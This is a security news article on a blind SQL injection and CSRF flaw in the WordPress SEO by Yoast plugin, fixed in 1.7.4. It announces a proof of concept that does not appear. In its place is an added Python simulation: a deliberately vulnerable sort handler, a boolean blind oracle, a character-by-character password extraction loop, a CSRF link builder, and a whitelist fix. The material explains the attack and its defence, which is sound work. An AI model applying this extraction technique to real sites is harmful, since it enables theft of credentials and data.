Millions of WordPress-based websites are exposed to a Blind SQL Injection flaw through a critical vulnerability in the very popular WordPress plugin "WordPress SEO by Yoast". The plugin has been updated; make sure to update your installation.
The flaw is present in most versions of the plugin named "WordPress SEO by Yoast". According to the Yoast website, the plugin has more than 14 million downloads, making it one of the most popular WordPress plugins for search engine optimization (SEO).
The vulnerability in WordPress SEO by Yoast was discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner "WPScan".
According to the published advisory, all versions of "WordPress SEO by Yoast" prior to the fixed release 1.7.4 (that is, 1.7.3.3 and earlier) are vulnerable to a Blind SQL Injection web application flaw.
SQL injection (SQLi) vulnerabilities are rated critical because they can lead to a database breach and the leakage of confidential information. In an SQLi attack, the attacker supplies crafted input from the client side that the application concatenates into an SQL query, altering the query's logic. In a blind SQLi, the query's output is never shown directly; the attacker infers it from differences in the application's behaviour, one true/false answer at a time.
However, in this case an unauthenticated attacker cannot trigger the vulnerability directly, because the flaw resides in the "admin/class-bulk-editor-list-table.php" file, which is accessible only to logged-in users with the Administrator, Editor or Author role.
Therefore, successful exploitation requires that the malicious request be issued by such an authorized user. An attacker can achieve this with social engineering: trick a logged-in privileged user into clicking a specially crafted URL carrying the payload, so that the victim's own browser sends the request together with their session cookies (a cross-site request forgery, CSRF).
If the authorized WordPress user falls victim to the attack, the exploit could execute arbitrary SQL queries on the victim's WordPress website, Ryan explained to security blogger Graham Cluley.
Proof Of Concept
Ryan also released a proof-of-concept payload for the Blind SQL Injection vulnerability in "WordPress SEO by Yoast", which is as follows:
The loophole has since been patched by the Yoast plugin developers in the latest version of WordPress SEO by Yoast (1.7.4); the changelog states that this version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor".
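The attack chain described above, as an added example that is neither the plugin's code nor Ryan's proof of concept: a Python simulation (SQLite standing in for MySQL) of a list-table handler that concatenates user-controlled sort parameters into its query, the boolean-based blind oracle an attacker obtains from it, the character-by-character extraction that oracle enables once a privileged user has clicked the crafted link, and the whitelist fix beside it. The injection point being a sort parameter, the `orderby`/`order` names, the table layout, the stored password and the admin path in `craft_link` are all assumptions constructed for this example.

```python
import sqlite3
from urllib.parse import urlencode


def make_db():
    """Constructed in-memory stand-in for a WordPress database (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO posts(title) VALUES ('alpha'), ('bravo'), ('charlie');
        CREATE TABLE users(id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO users(user_login, user_pass) VALUES ('admin', 'Hunter2!');
    """)
    return conn


def list_posts_vulnerable(conn, orderby, order):
    """Vulnerable pattern (illustrative, not the plugin's code): the sort
    parameters from the request are concatenated straight into the SQL string."""
    sql = f"SELECT title FROM posts ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_ORDERBY = {"id", "title"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_posts_fixed(conn, orderby, order):
    """Hardened form: column names and sort direction cannot be bound as
    query parameters, so they are validated against a fixed whitelist and
    anything else falls back to a safe default."""
    if orderby not in ALLOWED_ORDERBY:
        orderby = "title"
    order = order.upper() if order.upper() in ALLOWED_ORDER else "ASC"
    sql = f"SELECT title FROM posts ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


def injected_orderby(condition):
    """ORDER BY expression that sorts by id when `condition` is true and by -id
    otherwise. The page shows no error and no data, only a different row order."""
    return f"(CASE WHEN ({condition}) THEN id ELSE -id END)"


def oracle(conn, condition, handler=list_posts_vulnerable):
    """Boolean-based blind oracle: with ascending sort, 'alpha' comes first
    exactly when the injected condition is true."""
    return handler(conn, injected_orderby(condition), "ASC")[0] == "alpha"


def extract_secret(conn, max_len=64, handler=list_posts_vulnerable):
    """Recover the admin password one character at a time, using only the
    oracle's true/false answers and a binary search over printable code points."""
    sub = "(SELECT user_pass FROM users WHERE user_login='admin')"
    secret = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({sub}) >= {pos}", handler):
            break  # ran past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({sub},{pos},1)) > {mid}", handler):
                lo = mid + 1
            else:
                hi = mid
        secret += chr(lo)
    return secret


def craft_link(condition):
    """One link an attacker would get a logged-in editor to click (CSRF): the
    victim's browser sends it with their session cookies. Path and parameter
    names are hypothetical, not the plugin's."""
    params = {"orderby": injected_orderby(condition), "order": "ASC"}
    return "/wp-admin/admin.php?" + urlencode(params)


if __name__ == "__main__":
    db = make_db()
    print("crafted link:", craft_link("1=1"))
    print("vulnerable handler leaks:", extract_secret(db))
    print("fixed handler leaks:", extract_secret(db, handler=list_posts_fixed))
```

Against the vulnerable handler the loop recovers the stored password with a few hundred requests, each one a link the victim's browser fetches for the attacker; against the whitelisted handler every oracle query is sorted the same way, so the "extracted" value is garbage. The changelog's CSRF fix is the other half: even a correct query is only accepted when the request carries a valid nonce for the logged-in user, which a link from a third-party page cannot supply.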